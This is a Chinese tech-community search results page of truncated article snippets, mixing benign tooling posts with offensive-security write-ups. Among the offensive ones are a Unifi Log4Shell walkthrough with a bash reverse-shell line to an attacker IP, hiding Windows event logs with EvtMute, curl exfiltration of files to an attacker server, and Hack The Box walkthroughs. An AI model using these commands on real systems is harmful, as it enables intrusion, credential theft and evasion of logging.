首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

WPF版【路遥工具箱】免费开源啦!解决开发痛点,让你事半功倍!

RGB颜色转换:将RGB颜色值转换为十六进制或CSS颜色名称。 JSON转C#实体类:根据JSON数据生成C#实体类。 JSON转CSV:将JSON数据转换为CSV格式。...Postman数据转换:将Postman导出的数据转换为其他格式。 Yaml转Json:将Yaml格式的数据转换为Json格式。 文字工具 谷歌翻译:使用谷歌翻译API进行文本翻译。...多行拼接:将多行文本拼接为单行文本。 日志查看器:查看和分析日志文件。 全角半角转换:将全角字符转换为半角字符,或反之。 CSV查看器:查看和编辑CSV文件。...文件处理 编码识别:自动识别文件的编码格式。 文件校验:校验文件的完整性和一致性。 图片处理 图片转图标:将图片转换为ICO图标。 Gif分割:将GIF动画分割为多个静态图片。...图片转Base64:将图片转换为Base64编码。 Base64转图片:将Base64编码转换为图片。

53430

Unifi Log4jshell漏洞利用

echo 'bash -c bash -i >&/dev/tcp/192.168.11.50/4444 0>&1' | base64 使用 Base64 输出,在 rogue-jndi 中构建您的命令...,-d}|{bash,-i}" --hostname "192.168.11.50" 将上面命令中“echo”之后的 Base64 编码字符串替换为您生成的字符串。...将主机名变量替换为您将运行命令的主机的公共或本地 IP。然后启动您的 rogue-jndi LDAP 服务器。...后利用 - 破解哈希 首先,让我们从本地数据库转储密码哈希。使用反向 shell 执行以下命令以转储用户的 JSON 数组、他们的权限以及最重要的密码哈希。...上面详述的添加管理用户的过程可以使用像 Go 这样的编译语言轻松自动化。攻击者需要创建一个二进制文件来存储所有需要的依赖项,这些依赖项可以放到磁盘上并执行。

2.7K10
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    如何使用EvtMute对Windows事件日志进行筛选过滤

    写在前面的话 在这篇文章中,我们将告诉大家如何使用EvtMute来对Windows事件日志进行筛选过滤。...EvtMute这款工具允许我们使用YARA来进行攻击性操作,并对已经报告给Windows事件日志的事件进行过滤和筛选。...工具下载 广大研究人员可以使用下列命令将该项目克隆至本地: git clone https://github.com/bats3c/EvtMute 或者,大家也可以直接点击底部【阅读原文】访问该项目的Releases...这个规则可以使用Linux命令行终端轻松转换为Base64编码规则: base64 -w 0 YaraFilters/lsassdump.yar | echo $(</dev/stdin) 接下来,可以使用...因此,我建议大家手动将EvtMuteHook.dll注入到事件日志服务之中。 它的进程PID可以通过运行下列命令来查看,你还可以通过C2框架来将钩子手动注入至shellcode中。

    90210

    用轻量应用服务器从零搭建一个动漫风图片API

    二,安装动漫风图片API上面的环境安装成功后,将下面的附件下载后,通过宝塔上传到服务器上。进入左边的文件,上传这个压缩到这个目录,上传完了后,右键这个压缩包,选择解压。...确定后就需要等待系统的安装,在项目日志里,可以看到项目的进度和错误,错误一般是某个模块没有安装成功,我们根据提示手动添加一下模块即可。...然后绑定一下自己的域名,添加成功后宝塔就会给这个站点生成一个文件夹,进入文件夹,添加一个php文件,复制上面的代码php文件里,然后在根目录上传一个1.jpg的测试图片。...三,结语本文详细介绍了如何在腾讯云上搭建一个动漫风图片API服务,从选择操作系统、安装宝塔面板,到配置Nginx和Python环境,再到上传项目文件、配置反向代理,最后通过PHP代码测试API的正常运行...安装py的时候,可能会遇到模块未有安装,需要进入日志查看哪些模块没有安装。然后感谢一下作者的开源https://github.com/no1xuan/cartoon

    12250

    针对黑客的Windows文件传输总结

    要使用curl.exe将文件下载到受害者上,请使用以下命令: curl.exe 172.16.1.30/wget.exe -o C:\temp\wget.exe 我特意下载了wget.exe来表示可以…...借助 cURL,我们可以使用以下命令将文件上传到 Python HTTP 服务器: curl.exe -F 'file=@C:\\temp\\supersecret.txt' http://172.16.1.30...上传文件到攻击者的FTP服务器 当我们启动 FTP 服务器时,我们使用-w标志,它为任何登录用户提供写入权限。这允许我们使用PUT将文件上传到 FTP 服务器上。...https://github.com/fortra/impacket 从要传输到受害者的工具/文件所在的目录中,使用以下命令将该目录转换为共享: impacket-smbserver hax $(pwd...现在,我们可以在Invoke-Rubeus函数加载到当前会话中时执行该函数,并使用该脚本,而无需将其下载到受害者上。

    68411

    Python3读写base64格式base64使用场景

    base64转换过程 这几天写web,需要将用户上传的图片,实时显示到前端页面,然后通过Jcrop裁剪,并将裁剪后的图片通过canvas实时显示到前端,最后将canvas显示的图片装换为base64...格式,传到后端django,但pillow是无法直接读取base64格式的图片的,所以特地查阅了一些资料,发现python3内置了base64转换函数,这里分享一下使用方法... import os,.../robot.png", "rb") as f: # 将读取的二进制文件转换为base64字符串 bs64_str = base64.b64encode(f.read()) #...打印图像转换base64格式的字符串,type结果为 print(bs64_str, type(bs64_str)) # 将base64格式的数据装换为二进制数据...图片在网页上的表现形式 base64,这里放的是base64编码" /> # 使用正则从上面src

    4.4K80

    在线Base64转文件与文件转Base64工具

    本文将为您介绍一款强大的在线Base64转文件与文件转Base64工具,并详细说明其功能和使用方法。...二、主要功能文件转Base64:用户只需上传本地文件,工具即可自动将其内容进行Base64编码,生成可以直接复制粘贴的Base64字符串。...Base64转文件:对于已有的Base64字符串,用户可将其复制粘贴至指定区域,工具会快速解码并生成对应的文件,支持多种常见文件类型,如.jpg、.png、.pdf、.docx等。...三、使用教程文件转Base64:• 进入在线工具页面,找到“选择文件”按钮,点击后从本地选取需要转换的文件。...• 确认文件上传成功后,工具将自动进行Base64编码,并在界面显示转换后的字符串,您可以直接复制使用。Base64转文件:• 在相应的输入框内,粘贴准备好的Base64编码字符串。

    4.3K10

    如何在Ubuntu 16.04上使用Docker Swarm安装和保护OpenFaaS

    您将使用git来克隆OpenFaaS存储库,curl来测试API以及jq将原始JSON响应从API转换为人类可读的JSON。...在第7步中,您将使用它来创建Python函数并将其部署在OpenFaaS上。 在本教程中,您将部署OpenFaaS v 0.8.9。...要将Traefik与OpenFaaS一起使用,您需要修改OpenFaaS部署清单以包含Traefik并告诉OpenFaaS使用Traefik而不是直接将其服务暴露给互联网。...接下来,让我们指示Docker使用该command指令运行Traefik 。这将运行Traefik,将其配置为与Docker Swarm一起使用,并使用Let的加密提供SSL。...在OpenFaaS存储库中,您可以找到Swagger API规范,该规范可与Swagger编辑器一起使用,将规范转换为人类可读的形式。

    3.2K86

    HTB: Hackback

    经过测试后发现登录 hackthebox后会出现一个新的日志,其中sessionid就是我的内网地址 将日志名设置为该seesionid同时修改action为show后可以获取日志内容 curl -b...虽然无法知道知道它的真实路径,但是可以将php代码写入日志文件后查看。...使用 BurpSuite 抓取 admin.hackthebox.htb 的登录数据包并修改用户名为php代码,将其作为代码执行点 查询日志记录 curl -b "PHPSESSIONID=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7...首先将tunnel.aspx转换为base64编码 cat tunnel.aspx | base64 -w0 上传该base64编码并通过base64_decode()解码 github.com/decoder-it/diaghub_exploit 开始制作恶意 dll 文件,在此需要使用到 Visual Stdio,将上述文件夹打开并生成,选择

    1.3K10

    Python之Base64加解密

    urlsafe_b64encode,urlsafe_b64decode 一组,这个就是用来专门对url进行Base64编解码的,实际上也是调用的前一组函数。...3 base64转换过程 如下图所示: Python标准库中提供了base64模块,用来进行转换,因使用到以下二组方法,故做如下说明: base64.b64encode()将bytes类型数据进行base64...编码,返回编码后的bytes类型 base64.b64deocde()将base64编码的bytes类型进行解码,返回解码后的bytes类型 decode的作用是将其他编码的字符串转换成unicode编码...encode的作用是将unicode编码转换成其他编码的字符串 4 工作中遇到的问题 ---- 使用curl 命令可以正常的返回,如下: tony@l-l-server1.beta.op.tx1 ~...bytes.decode方法将token bytes类型转换为str.

    1.6K30

    【HTB靶场系列】靶机Carrier的渗透测试

    Check用base64转换下 ? 很明显这个quagga就是上面输出信息的一部分,查找相关资料,发现这是一款路由器软件 ?...我们需要在靶机上进行扫描,当然你可以用msf添加路由的方式扫描,这里我用另一个种方法把nmap的二进制静态执行文件上传到靶机进行扫描 Github:https://github.com/andrew-d...我们需要通过劫持BGP欺骗AS200将数据传输给我们的靶机,然后开启假的FTP服务,之前的信息有显示到有人会定期访问这个FTP,这样我们就可以窃取到凭证 ? ?...我们在自己的kali上编辑下内容在里面加一条10.120.15.0/25 ?...然后用python的SimpleHTTPServer服务上传到靶机里面去跟nmap一样 把之前的文件重命名,然后把我们的文件下载下来 1. curl http://10.10.13.133:8000/bgpd.conf

    2.2K20

    【HTB系列】靶机Frolic的渗透测试详解

    出现乱七八糟的东西,因为是别的文件数据,我们导出到一个文件并检查类型 1. base64 -d frolic.bas64 > frolic 2. file frolic ?...我们用zip2john把这个压缩文件转换为密码HASH,然后用john去破解下 1. zip2john frolic.zip > frolic.zip.hash ?...把这些内容输出到一个文件内并用base64转码下,注意这里的输出到文件带有换行需要去除文件里面的换行 1. cat index.php | xxd -r -p > index.php.b64 ?...使用python的SimpleHTTPServer的模块把LineEnum上传到靶机执行 然后在shell中执行 1. curl http://10.10.15.36:8000/LinEnum.sh |...()的地址 这里我需要在靶机上运行gdb查看,但是靶机没有gdb,我们需要从github上然后下载传到靶机上,靶机可以用wget命令进行下载,然后给gdb 加执行权限,最后对rop进行调试 Github

    2.1K10

    具有EC2自动训练的无服务器TensorFlow工作流程

    因为s3proxy将使用路径参数来定义所请求key的文件,并将其作为S3存储桶中的文件夹。 对于该train功能,将使用DynamoDB流触发器,该触发器将包含在资源部分中。...ECR —允许提取Docker映像(仅EC2会使用,而不是Lambda函数使用)。 IAM —获取,创建角色并将其添加到实例配置文件。...模型完成后,将使用tfjs模块中的转换器将其直接保存为TensorFlow.js可以导入的形式。然后将这些文件上传到S3并以当前纪元为键将其上传到新文件夹中。...成功后,将创建并启用警报,当CPU降至某个阈值以下时,该警报将自动终止实例,将其用作完成训练的代理。...可以在GitHub上查看所有代码: https://github.com/mikepm35/LambdaAutoTraining

    12.6K10

    PHP base64 编码转化图片并进行指定路径的保存和上传处理

    将获取的 base64 编码传到后台,如果后台顺利处理完毕,会返回它的存储路径,然后我进行了多图片存储路径在页面上(隐藏域)的拼接,方面后面提交后的数据库数据存储 2....核心函数 base64_image_content 该函数,我所参考的来源为 PHP将Base64图片转换为本地图片并保存,在此我根据自己的业务进行了相关处理 /** * [将Base64...图片转换为本地图片并保存] * @param $base64_image_content [要保存的Base64] * @param $path [要保存的路径] * @return...file_exists($basePutUrl)){ //检查是否有该文件夹,如果没有就创建,并给予最高权限 mkdir($basePutUrl...推荐文章: PHP base64转换成图片 ③.

    2.3K10

    Saferwall:下一代开源恶意软件分析平台

    下面给出的是文件扫描期间发生的基本工作流: 前端通过restapi与后端通信。 后端将样本上传到对象存储。 后端将消息推入扫描队列。 用户获取文件并将其复制到nfs共享,避免在每个容器上提取样本。...工具构建及部署 首先,使用下列命令将该项目的源码克隆至本地: git clone https://github.com/saferwall/saferwall 使用一个Debian Linux系统,建议...并确保已正确安装了build-essential: sudo apt-get install build-essential curl 将example.env改为.env,这个文件将存储项目的配置信息...构建AV镜像 编辑.env文件,并根据AV产品填写敏感凭据。 Eset:将许可证拷贝到....gRPC守护进程来监听扫描任务: make multiav-build-go 日志记录可以在Elasticsearch上看到: 项目地址 Saferwall:【https://github.com/saferwall

    1.3K20

    Elasticsearch:如何对 PDF 文件进行搜索

    实现原理 我们采用如下的方法来实现把一个 .pdf 文件导入到 Elasticsearch 的数据 node 中: 1.png 如上图所示,我们首先把我们的.pdf文件进行Base64的处理,然后上传到...如果不想增加在 base64 之间来回转换的开销,则可以使用 CBOR 格式而不是 JSON,并将字段指定为字节数组而不是字符串表示形式。 然后,处理器将跳过base64解码。...可以使用插件管理器安装此插件: sudo bin/elasticsearch-plugin install ingest-attachment 该插件必须安装在集群中的每个节点上,并且每个节点必须在安装后重新启动...的转换,并生成一个叫做j son.file 的文件。...在最后,我们把这个 json.file 文件的内容通过 curl 指令上传到 Elasticsearch 中。我们可以在 Elasticsearch 中查看一个叫做 pdf-test1 的索引。

    4.1K41
    领券